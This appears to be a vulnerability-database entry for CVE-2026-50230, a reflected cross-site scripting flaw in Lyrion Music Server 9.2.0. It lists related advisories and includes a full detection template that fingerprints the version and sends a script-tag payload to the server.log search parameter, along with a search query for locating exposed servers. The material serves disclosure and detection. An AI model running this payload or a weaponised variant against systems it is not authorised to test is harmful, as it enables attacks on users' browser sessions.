| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2026-50230 | 5 Jun 202613:24 | – | attackerkb | |
| CVE-2026-50230 | 12 Jun 202602:49 | – | circl | |
| Lyrion Music Server 跨站脚本漏洞 | 5 Jun 202600:00 | – | cnnvd | |
| CVE-2026-50230 | 5 Jun 202613:24 | – | cve | |
| CVE-2026-50230 Lyrion Music Server 9.2.0 Reflected XSS via server.log | 5 Jun 202613:24 | – | cvelist | |
| EUVD-2026-34829 | 5 Jun 202613:24 | – | euvd | |
| CVE-2026-50230 | 5 Jun 202614:16 | – | nvd | |
| 📄 Lyrion Music Server 9.2.0 server.log Reflected Cross Site Scripting | 5 Jun 202600:00 | – | packetstorm | |
| PT-2026-46949 | 5 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-50230 | 6 Jun 202618:43 | – | redhatcve |
| Source | Link |
|---|---|
| zeroscience | www.zeroscience.mk/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2026-50230 |
| lyrion | www.lyrion.org/ |
id: CVE-2026-50230
info:
name: Lyrion Music Server <= 9.2.0 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
Lyrion Music Server 9.2.0 contains a reflected XSS caused by improper sanitization of the search parameter in the server.log endpoint, letting unauthenticated attackers execute arbitrary script in users' browsers.
impact: |
Attackers can execute arbitrary JavaScript in users' browsers, potentially stealing session data or performing actions on behalf of users.
remediation: |
Update to the latest version that patches this vulnerability.
reference:
- https://www.zeroscience.mk/#/advisories/ZSL-2026-5988
- https://nvd.nist.gov/vuln/detail/CVE-2026-50230
- https://www.lyrion.org
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-50230
epss-score: 0.00324
epss-percentile: 0.24325
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
fofa-query: title="Lyrion Music Server"
tags: cve,cve2026,lyrion,lms,xss,reflected,unauth
flow: http(1) && http(2)
http:
- raw:
- |
POST /jsonrpc.js HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id":1,"method":"slim.request","params":[0,["version","?"]]}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "_version")'
- 'compare_versions(lmsversion, "<= 9.2.0")'
condition: and
internal: true
extractors:
- type: regex
name: lmsversion
part: body
regex:
- '"_version"\s*:\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?)'
group: 1
internal: true
- raw:
- |
GET /server.log?search=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a004630440220354c462668c799a7f1b953f6c7c119ad11b02af528cd29bf44fa6c190e2bd8df02205144fe6db72f04813d5e35493970750ea76c1c95cd1a1022eaff397b272d6801:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation